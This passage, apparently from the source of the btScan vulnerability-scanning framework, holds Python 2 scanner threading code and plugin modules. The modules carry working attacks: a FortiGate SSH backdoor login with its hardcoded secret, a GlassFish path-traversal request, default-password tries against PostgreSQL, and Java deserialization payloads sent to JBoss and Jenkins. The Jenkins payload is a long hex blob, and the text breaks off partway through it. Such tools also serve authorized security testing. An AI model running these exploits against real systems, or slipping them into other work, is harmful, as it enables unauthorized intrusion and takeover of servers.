105 |                         print "[-]%s" %url_full
106 |                         mlock.release()
107 |                 except Exception, e:
108 |                     print str(e)
109 |                     pass
110 |                 self.queue.task_done()
111 | 
112 |             # handle post method
113 |             if method == "post":
114 |                 url_full, f, data, scan_rule, res_rule = self.queue.get()
115 |                 try:
116 |                     r = requests.post(url_full, data=data, verify=False)
117 |                     page_content = r.content
118 |                     scan_reg = re.compile(r'%s' %scan_rule)
119 |                     res_reg = None
120 |                     if res_rule:
121 |                         res_reg = re.compile(r'%s' %res_rule)
122 |                     res = url_full
123 |                     if scan_reg.search(page_content) != None:
124 |                         #if define reg_rule, get reg result
125 |                         if res_reg:
126 |                             if res_reg.findall(page_content) != []:
127 |                                 for item in res_reg.findall(page_content):
128 |                                     res += "\t" + item
129 |                                     res += "\n"
130 |                                 mlock = Lock()
131 |                                 mlock.acquire()
132 |                                 print "[+]%s" %res
133 |                                 f.write(res)
134 |                                 mlock.release()
135 |                             else:
136 |                                 mlock = Lock()
137 |                                 mlock.acquire()
138 |                                 print "[-]%s" %url_full
139 |                                 mlock.release()
140 |                         #just only judge exploit or not
141 |                         else:
142 |                             mlock = Lock()
143 |                             mlock.acquire()
144 |                             print "[+]%s" %url_full
145 |                             f.write(url_full)
146 |                             mlock.release()
147 |                     else:
148 |                         mlock = Lock()
149 |                         mlock.acquire()
150 |                         print "[-]%s" %url_fulls
151 |                         mlock.release()
152 |                 except Exception, e:
153 |                     print str(e)
154 |                     pass
155 |                 self.queue.task_done()


--------------------------------------------------------------------------------
/lib/scanframe.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/scanframe.pyc


--------------------------------------------------------------------------------
/lib/scriptframe.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #coding=utf8
  3 | 
  4 | import threading
  5 | from Queue import Queue
  6 | import sys
  7 | import time
  8 | import os
  9 | from termcolor import colored
 10 | from report import TEMPLATE_html, TEMPLATE_li
 11 | from string import Template
 12 | 
 13 | '''load script class'''
 14 | class ScriptFrame:
 15 |     def __init__(self, ui_list, thread_num, script_name, cd):
 16 |         self.ui_list =  ui_list
 17 |         self.thread_num = thread_num
 18 |         self.script_name = script_name
 19 |         self.cd = cd
 20 |     
 21 |     #scan method
 22 |     def scan(self):
 23 |         f = open('res.txt', 'w+')
 24 |         global rres
 25 |         rres = []
 26 |         queue = Queue()
 27 |         #thread nums
 28 |         for i in xrange(self.thread_num):
 29 |             worker = SriptThread(queue, self.cd)
 30 |             worker.daemon = True
 31 |             worker.start()
 32 |         for ui in self.ui_list:
 33 |             queue.put((ui, f, rres, self.script_name))
 34 | 
 35 |         queue.join()
 36 |         f.close()
 37 |         
 38 |     def script_report(self):
 39 |         report_name = 'btscan_' + time.strftime('%Y%m%d_%H%M%S', time.localtime()) + '.html' 
 40 |         report_path = os.path.dirname(os.path.dirname(__file__)) + os.sep + 'report' + os.sep
 41 |         t_html = Template(TEMPLATE_html)
 42 |         t_li = Template(TEMPLATE_li)
 43 |         _str = ""
 44 |         for ele in rres:
 45 |             _str += t_li.substitute({'href':ele[0], 'msg':ele[1]})
 46 |         html_doc = t_html.substitute({'content':_str})
 47 |         with open(report_path+report_name, 'w') as outFile:
 48 |             outFile.write(html_doc)
 49 |         print 
 50 |         print colored('Report saved to report/%s' % report_name, 'red')
 51 | 
 52 | '''script threads'''
 53 | class SriptThread(threading.Thread):
 54 |     def __init__(self, queue, cd):
 55 |         threading.Thread.__init__(self)
 56 |         self.queue = queue
 57 |         self.cd = cd
 58 | 
 59 |     def run(self):
 60 |         sys.path.append("..")
 61 |         if self.cd == 'exploit':
 62 |             while True:
 63 |                 ui, f, rres, script_name = self.queue.get()
 64 |                 mod = script_name        
 65 |                 __import__(mod)
 66 |                 try:
 67 |                     res = sys.modules[mod].exploit(ui)
 68 |                     if 'True' in res:
 69 |                         mlock = threading.Lock()
 70 |                         mlock.acquire()
 71 |                         rres.append((res[1], res[2]))
 72 |                         print '[+]{0:70}{1}'.format(res[1], res[2])
 73 |                         f.write(res[1]+'\n')
 74 |                         mlock.release()
 75 |                     else:
 76 |                         mlock = threading.Lock()
 77 |                         mlock.acquire()
 78 |                         print '[+]{0:70}{1}'.format(res[1], res[2])
 79 |                         mlock.release()
 80 |                 except Exception, e:
 81 |                     print str(e)
 82 |                     pass
 83 |                 self.queue.task_done()
 84 |         else:
 85 |             while True:
 86 |                 ui, f, rres, script_name = self.queue.get()
 87 |                 mod = script_name        
 88 |                 __import__(mod)
 89 |                 try:
 90 |                     res = sys.modules[mod].verify(ui)
 91 |                     if True in res:
 92 |                         mlock = threading.Lock()
 93 |                         mlock.acquire()
 94 |                         rres.append((res[1], res[2]))
 95 |                         print '[+]{0:70}{1}'.format(res[1], res[2])
 96 |                         f.write(res[1]+'\n')
 97 |                         mlock.release()
 98 |                     else:
 99 |                         mlock = threading.Lock()
100 |                         mlock.acquire()
101 |                         print '[-]{0:70}{1}'.format(res[1], res[2])
102 |                         mlock.release()
103 |                 except Exception, e:
104 |                     print str(e)
105 |                     pass
106 |                 self.queue.task_done()


--------------------------------------------------------------------------------
/lib/scriptframe.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/scriptframe.pyc


--------------------------------------------------------------------------------
/node/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/__init__.py


--------------------------------------------------------------------------------
/node/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/__init__.pyc


--------------------------------------------------------------------------------
/node/ext/ParseUrl.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import urlparse
 5 | import re
 6 | 
 7 | class ParseUrl:
 8 |     def __init__(self):
 9 |         pass
10 | 
11 |     def judgeIP(self, ip):
12 |         reg = re.compile(r'^(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])$')
13 |         if reg.findall(ip):
14 |             return ip
15 |         else:
16 |             return False
17 | 
18 |     def parse(self, url):
19 |         _ = urlparse.urlparse(url, 'http')
20 |         if not _.netloc:
21 |                 _ = urlparse.urlparse('http://' + url, 'http')
22 |         if _.port:
23 |             return _.netloc.split(':')[0], _.port
24 |         else:
25 |             return _.netloc, 80


--------------------------------------------------------------------------------
/node/ext/ParseUrl.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/ext/ParseUrl.pyc


--------------------------------------------------------------------------------
/node/ext/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/ext/__init__.py


--------------------------------------------------------------------------------
/node/ext/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/ext/__init__.pyc


--------------------------------------------------------------------------------
/node/fortigate.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
 4 | # Usage: ./fgt_ssh_backdoor.py <target-ip>
 5 | 
 6 | import socket
 7 | import select
 8 | import sys
 9 | import paramiko
10 | from paramiko.py3compat import u
11 | import base64
12 | import hashlib
13 | import termios
14 | import tty
15 | 
16 | def custom_handler(title, instructions, prompt_list):
17 |     n = prompt_list[0][0]
18 |     m = hashlib.sha1()
19 |     m.update('\x00' * 12)
20 |     m.update(n + 'FGTAbc11*xy+Qqz27')
21 |     m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
22 |     h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
23 |     return [h]
24 | 
25 | 
26 | def verify(host):
27 |     client = paramiko.SSHClient()
28 |     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
29 | 
30 |     try:
31 |         client.connect(host, username='', allow_agent=False, look_for_keys=False)
32 |     except paramiko.ssh_exception.SSHException, e:
33 |         pass
34 |     else:
35 |         msg = 'safe'
36 |         return False, host, msg
37 | 
38 |     trans = client.get_transport()
39 |     try:
40 |         trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
41 |     except paramiko.ssh_exception.AuthenticationException, e:
42 |         pass
43 |     else:
44 |         msg = 'safe'
45 |         return False, host, msg
46 |     
47 |     try:
48 |         trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
49 |         msg = 'vul'
50 |         return True, host, msg
51 |     except Exception, e:
52 |         msg = 'safe'
53 |         return False, host, msg
54 | 
55 | 
56 | if __name__ == '__main__':
57 |     main()
58 | 


--------------------------------------------------------------------------------
/node/fortigate.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/fortigate.pyc


--------------------------------------------------------------------------------
/node/glassfish.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import requests
 5 | 
 6 | def verify(ip):
 7 |     url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
 8 |     try:
 9 |         r = requests.get(url, verify=False, timeout=5)
10 |         if 'ejb-timer-service-app' in r.text:
11 |             msg = 'vul'
12 |             return True, ip, msg
13 | 	else:
14 |             msg = 'safe'
15 |             return False, ip, msg
16 |     except Exception, e:
17 |         #msg = str(e)
18 | 	msg = 'safe'
19 |         return False, ip, msg
20 | 


--------------------------------------------------------------------------------
/node/glassfish.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/glassfish.pyc


--------------------------------------------------------------------------------
/node/gres_weak.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import psycopg2
 5 | import sys
 6 | 
 7 | username = ['postgres', 'root']
 8 | weakpass = ['', 'postgres', '123456', 'root']
 9 | 
10 | def verify(host):    
11 |     port = '5432'
12 |     for user in username:
13 |         for password in weakpass:
14 |             try:
15 |                 conn = psycopg2.connect(host=host, port=port, user=user, password=password)
16 |                 msg = 'vul'
17 |                 return True, host, msg
18 |             except Exception, e:
19 |                 return False, host, str(e)


--------------------------------------------------------------------------------
/node/jboss_ser.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #coding=utf8
 3 | 
 4 | import requests
 5 | import sys 
 6 | import os
 7 | import urlparse
 8 | from ext.ParseUrl import ParseUrl
 9 | 
10 | '''
11 | you can verify through access.log, command like this:
12 | cat access.* | awk '{if ($7~/wolegecajboss.txt/) print $1}' | uniq | sort
13 | '''
14 | ppath = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'static' + os.sep + 'jboss_poc.bin'
15 | 
16 | def verify(host):
17 |     parse = ParseUrl()
18 |     if parse.judgeIP(host):
19 |         #jboss default port
20 |         # port = 8080
21 |         port = 80
22 |     else:
23 |         host, port = parse.parse(host)
24 |     payloadObj = open(ppath,'rb').read()
25 |     URL = "http://"+host+":"+str(port)+"/invoker/JMXInvokerServlet"
26 |     try:
27 |     	requests.post(URL, data=payloadObj, timeout=10)
28 |     	msg = 'may vul, check access.log'
29 |         return False, URL, msg
30 |     except Exception, e:
31 |         msg = str(e)
32 |         return False, URL, msg
33 | 


--------------------------------------------------------------------------------
/node/jboss_ser.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/node/jboss_ser.pyc


--------------------------------------------------------------------------------
/node/jenkins_ser.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #coding=utf8
 3 | 
 4 | import socket
 5 | import sys
 6 | import os
 7 | import requests
 8 | import base64
 9 | import urlparse
10 | from ext.ParseUrl import ParseUrl
11 | 
12 | '''
13 | you can verify through access.log, command like this:
14 | cat access.* | awk '{if ($7~/wolegecajboss.txt/) print $1}' | uniq | sort
15 | '''
16 | ppath = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'static' + os.sep + 'jenkins_poc.bin'
17 | 
18 | def verify(host):
19 |     parse = ParseUrl()
20 |     if parse.judgeIP(host):
21 |         #jenkins default port
22 |         port = 8080
23 |     else:
24 |         host, port = parse.parse(host)
25 |     try:
26 |         #Query Jenkins over HTTP to find what port the CLI listener is on
27 |         r = requests.get('http://'+host+':'+str(port),timeout=10)
28 |         cli_port = int(r.headers['X-Jenkins-CLI-Port'])
29 |         #Open a socket to the CLI port
30 |         socket.setdefaulttimeout(10)
31 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
32 |         server_address = (host, cli_port)
33 |         sock.connect(server_address)
34 |         # Send headers
35 |         headers='\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
36 |         sock.send(headers)
37 |         data = sock.recv(1024)
38 |         data = sock.recv(1024)
39 |         payloadObj = open(ppath,'rb').read()
40 |         payload_b64 = base64.b64encode(payloadObj)
41 |         payload='\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'+payload_b64+'\x00\x00\x00\x00\x11\x2d\xac\xed\x00\x05\x73\x72\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x4c\x00\x10\x63\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x50\x72\x6f\x78\x79\x74\x00\x30\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x3b\x5b\x00\x07\x72\x65\x71\x75\x65\x73\x74\x74\x00\x02\x5b\x42\x4c\x00\x08\x74\x6f\x53\x74\x72\x69\x6e\x67\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x03\x49\x00\x02\x69\x64\x49\x00\x08\x6c\x61\x73\x74\x49\x6f\x49\x64\x4c\x00\x08\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x00\x1a\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x52\x65\x73\x70\x6f\x6e\x73\x65\x3b\x78\x72\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x09\x63\x72\x65\x61\x74\x65\x64\x41\x74\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x1e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x24\x53\x6f\x75\x72\x63\x65\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x19\x4c\x68\x75\x64\x73\x6f\x6e\x2f\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3b\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\xd0\xfd\x1f\x3e\x1a\x3b\x1c\xc4\x02\x00\x00\x78\x72\x00\x13\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\xd5\xc6\x35\x27\x39\x77\xb8\xcb\x03\x00\x04\x4c\x00\x05\x63\x61\x75\x73\x65\x74\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x6f\x77\x61\x62\x6c\x65\x3b\x4c\x00\x0d\x64\x65\x74\x61\x69\x6c\x4d\x65\x73\x73\x61\x67\x65\x71\x00\x7e\x00\x03\x5b\x00\x0a\x73\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x74\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x4c\x00\x14\x73\x75\x70\x70\x72\x65\x73\x73\x65\x64\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x74\x00\x10\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4c\x69\x73\x74\x3b\x78\x70\x71\x00\x7e\x00\x10\x70\x75\x72\x00\x1e\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x78\x70\x00\x00\x00\x0c\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x03\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x03\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x3c\x74\x00\x1b\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x74\x00\x10\x55\x73\x65\x72\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x04\x63\x61\x6c\x6c\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x3c\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x70\x73\x7d\x00\x00\x00\x02\x00\x2e\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x00\x1c\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x49\x52\x65\x61\x64\x52\x65\x73\x6f\x6c\x76\x65\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x05\x5a\x00\x14\x61\x75\x74\x6f\x55\x6e\x65\x78\x70\x6f\x72\x74\x42\x79\x43\x61\x6c\x6c\x65\x72\x5a\x00\x09\x67\x6f\x69\x6e\x67\x48\x6f\x6d\x65\x49\x00\x03\x6f\x69\x64\x5a\x00\x09\x75\x73\x65\x72\x50\x72\x6f\x78\x79\x4c\x00\x06\x6f\x72\x69\x67\x69\x6e\x71\x00\x7e\x00\x0d\x78\x70\x00\x00\x00\x00\x00\x02\x00\x73\x71\x00\x7e\x00\x0b\x71\x00\x7e\x00\x43\x74\x00\x78\x50\x72\x6f\x78\x79\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x40\x32\x20\x77\x61\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x66\x6f\x72\x20\x69\x6e\x74\x65\x72\x66\x61\x63\x65\x20\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x24\x49\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x75\x71\x00\x7e\x00\x11\x00\x00\x00\x0d\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x7d\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x89\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x74\x00\x04\x77\x72\x61\x70\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x6a\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x74\x00\x06\x65\x78\x70\x6f\x72\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x02\xa6\x74\x00\x21\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x74\x00\x16\x52\x65\x6d\x6f\x74\x65\x43\x6c\x61\x73\x73\x4c\x6f\x61\x64\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x4a\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x46\x71\x00\x7e\x00\x1d\x71\x00\x7e\x00\x1e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x03\x08\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x22\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xfa\x71\x00\x7e\x00\x24\x71\x00\x7e\x00\x25\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x71\x00\x7e\x00\x28\x70\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x71\x00\x7e\x00\x20\x71\x00\x7e\x00\x21\x71\x00\x7e\x00\x2b\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x71\x00\x7e\x00\x30\x71\x00\x7e\x00\x31\x71\x00\x7e\x00\x32\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2d\x71\x00\x7e\x00\x2e\x7